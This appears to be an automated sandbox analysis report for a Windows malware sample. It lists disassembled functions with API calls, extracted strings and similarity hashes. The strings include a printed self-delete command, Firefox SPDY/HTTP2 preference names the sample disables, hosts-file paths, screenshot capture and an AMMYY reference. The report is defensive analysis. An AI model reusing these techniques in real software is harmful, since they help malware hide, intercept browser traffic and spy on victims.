                                                                                                                                                                                                                                                                                            Function 0040A8B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404B40: VirtualAlloc.KERNEL32(00000000,00000109,00003000,00000004,?,?,0040411D,?), ref: 00404B51
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            • sprintf.MSVCRT ref: 0040A90F
                                                                                                                                                                                                                                                                                            • sprintf.MSVCRT ref: 0040A923
                                                                                                                                                                                                                                                                                            • _endthreadex.MSVCRT(00000000), ref: 0040A980
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocVirtualsprintf$_endthreadex
                                                                                                                                                                                                                                                                                            • String ID: %s %s
                                                                                                                                                                                                                                                                                            • API String ID: 2621873700-2939940506
                                                                                                                                                                                                                                                                                            • Opcode ID: b0da3b10f1ed82e0112ae8878d8ba1af9585117033ca3846c36750e99de01216
                                                                                                                                                                                                                                                                                            • Instruction ID: c01f936ddc6928722aafe6f7d1980acef65d0fbf2d9a2e5eb23046a41ed7f736
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0da3b10f1ed82e0112ae8878d8ba1af9585117033ca3846c36750e99de01216
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA212270504208FFDB11AF60D806B9E7BA4EF40358F10443EF844762D2D7BE9A919A59
                                                                                                                                                                                                                                                                                            Function 00407138 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44threadCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00407038: GetModuleHandleA.KERNEL32(xul.dll), ref: 0040703E
                                                                                                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 004071B5
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • network.http.spdy.enabled, xrefs: 00407157
                                                                                                                                                                                                                                                                                            • network.http.spdy.enabled.v3-1, xrefs: 00407147
                                                                                                                                                                                                                                                                                            • network.http.spdy.enabled.http2, xrefs: 00407166
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ExitHandleModuleThread
                                                                                                                                                                                                                                                                                            • String ID: network.http.spdy.enabled$network.http.spdy.enabled.http2$network.http.spdy.enabled.v3-1
                                                                                                                                                                                                                                                                                            • API String ID: 2306408829-2830041269
                                                                                                                                                                                                                                                                                            • Opcode ID: ac7c64d2914a837005a64ef2e77bbae8bfcb6d0616092af3c5bb99052eb6a454
                                                                                                                                                                                                                                                                                            • Instruction ID: b645bb33f3690f7efb38002f37e333da0407941bb56710324032b4bd20fe1697
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac7c64d2914a837005a64ef2e77bbae8bfcb6d0616092af3c5bb99052eb6a454
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60F0C236A4434166FA3033B19D9BB6726458FC1B94F10853FB901FB2D1DEBC8C8491AE
                                                                                                                                                                                                                                                                                            Function 0040AA73 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • ping 127.0.0.1 -n 3&del "%s", xrefs: 0040AAC9
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: memset$wsprintf
                                                                                                                                                                                                                                                                                            • String ID: ping 127.0.0.1 -n 3&del "%s"
                                                                                                                                                                                                                                                                                            • API String ID: 1651128882-2576017089
                                                                                                                                                                                                                                                                                            • Opcode ID: 0ea85a1cfb1554be7e531fc598d6faa94bb77c13fd26d5c0f05194fb60129c20
                                                                                                                                                                                                                                                                                            • Instruction ID: e0f610ce0ca63109886393cd8f86ac73501c537212b8f915c5781b4adf24ece3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ea85a1cfb1554be7e531fc598d6faa94bb77c13fd26d5c0f05194fb60129c20
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31F012B5C1022C69CB60E7B58C4DFCB73ACAF04344F0005B67618F2092EA749BD48BA9
                                                                                                                                                                                                                                                                                            Function 00401631 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34sleepCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InterlockedCompareExchange.KERNEL32(0041A908,00000001,00000000), ref: 0040164B
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000001), ref: 00401664
                                                                                                                                                                                                                                                                                            • InterlockedCompareExchange.KERNEL32(0041A908,00000001,00000000), ref: 0040166E
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CompareExchangeInterlocked$Sleep
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1766322245-3916222277
                                                                                                                                                                                                                                                                                            • Opcode ID: 1b17fa83b11a3fb0155d9d4c4589fb0e8afcf26a233eb6726440a5e3e8d473eb
                                                                                                                                                                                                                                                                                            • Instruction ID: 3146644f708acef42d48bdf34e0c10a7afb47483ee5a9ffb90359bdae2770461
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b17fa83b11a3fb0155d9d4c4589fb0e8afcf26a233eb6726440a5e3e8d473eb
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 57F02B32781308F7EB1053918E82FEB326C9742B59F144037F601B60C0C3FAA981857D
                                                                                                                                                                                                                                                                                            Function 00405E89 Relevance: 6.1, APIs: 4, Instructions: 125COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000014), ref: 00405EB8
                                                                                                                                                                                                                                                                                            • realloc.MSVCRT ref: 00405F00
                                                                                                                                                                                                                                                                                            • IsBadReadPtr.KERNEL32(-000000DC,00000014), ref: 00405F91
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Read$realloc
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1241503663-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 56f4925823c77dbdb00473b869507d096924a3e80ead695488937fdde5cdbafd
                                                                                                                                                                                                                                                                                            • Instruction ID: c2917731f4da528e9a0bf099748f17bf4ccf5599c3ba980bf665be7c3becfa2b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56f4925823c77dbdb00473b869507d096924a3e80ead695488937fdde5cdbafd
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4417971A04606EFEB208FA5C844B6BB7F5EF04310F24457AE556A72D0D738E941DF58
                                                                                                                                                                                                                                                                                            Function 004014DA Relevance: 6.1, APIs: 4, Instructions: 77memoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,?,00000040,?), ref: 00401515
                                                                                                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000040,?), ref: 00401561
                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,?,?,?,00000040,?), ref: 0040156B
                                                                                                                                                                                                                                                                                            • FlushInstructionCache.KERNEL32(00000000,?,?,00000040,?), ref: 00401572
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4115577372-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 33fba6efa9aa37a32695c853373d2d2382bf6eca6c8649853a7649370b02e70f
                                                                                                                                                                                                                                                                                            • Instruction ID: 98677d2faea99ee57e6bc5d1e6dd12a9e2edf7674fd3a44d719a18d412bfc6ed
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33fba6efa9aa37a32695c853373d2d2382bf6eca6c8649853a7649370b02e70f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F21A172600204FFCB01CFA8DD85B9E7FB8AF49314F1442A6E902EA2E4D378D644C755
                                                                                                                                                                                                                                                                                            Function 0040ADB4 Relevance: 6.1, APIs: 4, Instructions: 70networksynchronizationthreadCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0040ADD7
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0040ADEF
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C17: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,004079DA,8EB39475,?,?,?), ref: 00404C34
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404B40: VirtualAlloc.KERNEL32(00000000,00000109,00003000,00000004,?,?,0040411D,?), ref: 00404B51
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000A13C,00000000,00000000,00000000), ref: 0040AE3A
                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 0040AE43
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocVirtual$InternetOptionQuery$CreateObjectSingleThreadWait
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2109580575-0
                                                                                                                                                                                                                                                                                            • Opcode ID: ddf6a12d34df4d65e3d98ad85dc65d36ba597e1d57071206ca6313221c280cf7
                                                                                                                                                                                                                                                                                            • Instruction ID: 85f8da8ab98e3e359bb9ffee973ef0ed3ed5780d50117302d11dec6e27627b2d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ddf6a12d34df4d65e3d98ad85dc65d36ba597e1d57071206ca6313221c280cf7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B211DB1900209FFDF11AFA1DD49D9E7F69EB44358F00402ABA04A6191D7759D60DBA4
                                                                                                                                                                                                                                                                                            Function 0040ACFD Relevance: 6.1, APIs: 4, Instructions: 69networksynchronizationthreadCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0040AD20
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0040AD38
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C17: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,004079DA,8EB39475,?,?,?), ref: 00404C34
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404B40: VirtualAlloc.KERNEL32(00000000,00000109,00003000,00000004,?,?,0040411D,?), ref: 00404B51
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000A13C,00000000,00000000,00000000), ref: 0040AD83
                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 0040AD8C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocVirtual$InternetOptionQuery$CreateObjectSingleThreadWait
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2109580575-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 81e12cd764da1528d32e4904fdccbe766ef669b6baaa3c7432b9a665d274c7da
                                                                                                                                                                                                                                                                                            • Instruction ID: 4327dd8a261df6e6574da9dc39f369b90856255ce890c35f50618d1bcf3a43d3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 81e12cd764da1528d32e4904fdccbe766ef669b6baaa3c7432b9a665d274c7da
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA112CB1900209FFEB11AFA1DD49D9EBF69EB44358F00802ABA04A7191D7759E60DB64
                                                                                                                                                                                                                                                                                            Function 00401491 Relevance: 6.0, APIs: 4, Instructions: 29threadmemoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • OpenThread.KERNEL32(0000005A,00000000,00000000,?,?,0040162B), ref: 004014A7
                                                                                                                                                                                                                                                                                            • ResumeThread.KERNEL32(00000000,?,?,0040162B), ref: 004014B4
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,0040162B), ref: 004014BB
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,0040162B), ref: 004014D2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Thread$CloseFreeHandleHeapOpenResume
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 993137029-0
                                                                                                                                                                                                                                                                                            • Opcode ID: ba3a4b9eab9395966fea36ccecf66b824b248734ff01ec692414fe074bab3333
                                                                                                                                                                                                                                                                                            • Instruction ID: 79214c585a8421c61a794e324dc1ff4e28f576e7ea37099e67f93a857c770830
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba3a4b9eab9395966fea36ccecf66b824b248734ff01ec692414fe074bab3333
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 57F03031200702EFDB215F95EDC4B1677E9FB44741F20863AF586611B0C7356481DF29
                                                                                                                                                                                                                                                                                            Function 004059B3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            • _endthreadex.MSVCRT(00000000), ref: 00405A5A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocVirtual_endthreadex
                                                                                                                                                                                                                                                                                            • String ID: Software\Z0BAZwxx\Addr\$remove
                                                                                                                                                                                                                                                                                            • API String ID: 1882685189-3233916144
                                                                                                                                                                                                                                                                                            • Opcode ID: d19259da940ea4070624123dbb572b27c287cd82d936770fdcd69e1385ab5584
                                                                                                                                                                                                                                                                                            • Instruction ID: e348d27a53ac47a28f771e4e7b5bcb066840831ebc80282ed624f7be9f97a654
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d19259da940ea4070624123dbb572b27c287cd82d936770fdcd69e1385ab5584
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9110A31508204ABDB117B65D946B9F7FA8DF91354F10403FF844771D2DBBC59418A6D
                                                                                                                                                                                                                                                                                            Function 00402445 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: memsetwsprintf
                                                                                                                                                                                                                                                                                            • String ID: d&%ls&%ls&%ls&%S&%ls
                                                                                                                                                                                                                                                                                            • API String ID: 2856067436-941614314
                                                                                                                                                                                                                                                                                            • Opcode ID: f44854d22df9448e6428b447e49cfb0dada4c7b2c9f8bed5b18710ace043fa38
                                                                                                                                                                                                                                                                                            • Instruction ID: 5969caadbbd574221523bcd0f1be0b9f2921e298d21b0f94d9c5ce1c22e7f39c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f44854d22df9448e6428b447e49cfb0dada4c7b2c9f8bed5b18710ace043fa38
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB112C70100204ABEB106F28EE4AEAF3794AB81704F00403BF915AA1D2D6B9E4A1472D
                                                                                                                                                                                                                                                                                            Function 004090C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                              • Part of subcall function 00402E20: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B), ref: 00402E3B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00402E20: PathAppendW.SHLWAPI(00000000,00408038,?,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B,00408038,?,004054CD), ref: 00402E5C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00402E20: CreateDirectoryW.KERNEL32(00000000,00000000,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B,00408038,?,004054CD), ref: 00402E65
                                                                                                                                                                                                                                                                                              • Part of subcall function 00402E20: SetFileAttributesW.KERNEL32(00000000,00000006,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B,00408038,?,004054CD), ref: 00402E72
                                                                                                                                                                                                                                                                                              • Part of subcall function 00402E20: PathAppendW.SHLWAPI(00000000,00407E9B,?,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B,00408038,?,004054CD), ref: 00402E7C
                                                                                                                                                                                                                                                                                            • _endthreadex.MSVCRT(00000000), ref: 0040913C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00409018: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040903B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00409018: GetSystemMetrics.USER32(00000000), ref: 00409048
                                                                                                                                                                                                                                                                                              • Part of subcall function 00409018: GetSystemMetrics.USER32(00000001), ref: 0040904F
                                                                                                                                                                                                                                                                                              • Part of subcall function 00409018: CreateCompatibleDC.GDI32(00000000), ref: 00409055
                                                                                                                                                                                                                                                                                              • Part of subcall function 00409018: GetDC.USER32(00000000), ref: 0040906B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00409018: CreateCompatibleBitmap.GDI32(00000000), ref: 0040906E
                                                                                                                                                                                                                                                                                              • Part of subcall function 00409018: SelectObject.GDI32(?,00000000), ref: 0040907B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00409018: GetDC.USER32(00000000), ref: 00409089
                                                                                                                                                                                                                                                                                              • Part of subcall function 00409018: BitBlt.GDI32(?,00000000,00000000,?,?,00000000), ref: 00409097
                                                                                                                                                                                                                                                                                              • Part of subcall function 00409018: DeleteObject.GDI32(?), ref: 004090AD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00409018: GdiplusShutdown.GDIPLUS(?), ref: 004090B6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00408B72: sprintf.MSVCRT ref: 00408C44
                                                                                                                                                                                                                                                                                              • Part of subcall function 00408B72: wsprintfA.USER32 ref: 00408C80
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreatePath$AppendCompatibleGdiplusMetricsObjectSystem$AllocAttributesBitmapDeleteDirectoryFileFolderSelectShutdownStartupVirtual_endthreadexsprintfwsprintf
                                                                                                                                                                                                                                                                                            • String ID: Z0BAZwxx$\screenshot.jpg
                                                                                                                                                                                                                                                                                            • API String ID: 1151080723-1615771018
                                                                                                                                                                                                                                                                                            • Opcode ID: 0df8939dc79758e248a3249ddbe0df6caf7780c9d7edccc916dfe6d68158da24
                                                                                                                                                                                                                                                                                            • Instruction ID: cd78c62ea983c312288fd31c21fd840951ac9d491fd5078f52529bde2f4c188f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0df8939dc79758e248a3249ddbe0df6caf7780c9d7edccc916dfe6d68158da24
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C7F04B6268522539F5253272AD0BEAB2A5CCF92764F21003FF904B61C3EEBD594200AE
                                                                                                                                                                                                                                                                                            Function 00406E43 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41threadCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 00406EA9
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                              • Part of subcall function 00409BA4: GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00409BB2
                                                                                                                                                                                                                                                                                              • Part of subcall function 00409BA4: GetProcAddress.KERNEL32(00000000,sprintf), ref: 00409BC8
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressAllocExitHandleModuleProcThreadVirtual
                                                                                                                                                                                                                                                                                            • String ID: %s:ZKTDJRBHOEUDX$AMMYY
                                                                                                                                                                                                                                                                                            • API String ID: 3375109803-2616122583
                                                                                                                                                                                                                                                                                            • Opcode ID: 5f07cd6feea3f80a6d5910947b139aab12928ac3e85777d95f7bd3bc1d253d15
                                                                                                                                                                                                                                                                                            • Instruction ID: a767efb5eee708c685ae28445d948c501301659c9242652d4ff3cec2c730faad
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f07cd6feea3f80a6d5910947b139aab12928ac3e85777d95f7bd3bc1d253d15
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21F0E965141720BAE1202375ED87F5B1959CF46764F22003BF905F61C1EEBCB94540BD

                                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                                            Function 007B0005 Relevance: 12.7, Strings: 10, Instructions: 164COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000029.00000002.4023037296.00000000007B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_41_2_7b0000_sedSmibSjDOiaD.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$X@$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                                                                            • API String ID: 0-623675093
                                                                                                                                                                                                                                                                                            • Opcode ID: 0b236e4183e66166baeedc4bb63a439747f50f47959c2c25ea662ca91e6778b3
                                                                                                                                                                                                                                                                                            • Instruction ID: b77d264d76fd5a7f4237962b160cabbdb937f4a9b64e71e9dd979c0c89808226
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b236e4183e66166baeedc4bb63a439747f50f47959c2c25ea662ca91e6778b3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19613C71640289EFEF10DFA0CC49FEA3768EB44701F544515EE09BE1E0D6B5AA448BAA
                                                                                                                                                                                                                                                                                            Function 007B06D1 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000029.00000002.4023037296.00000000007B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
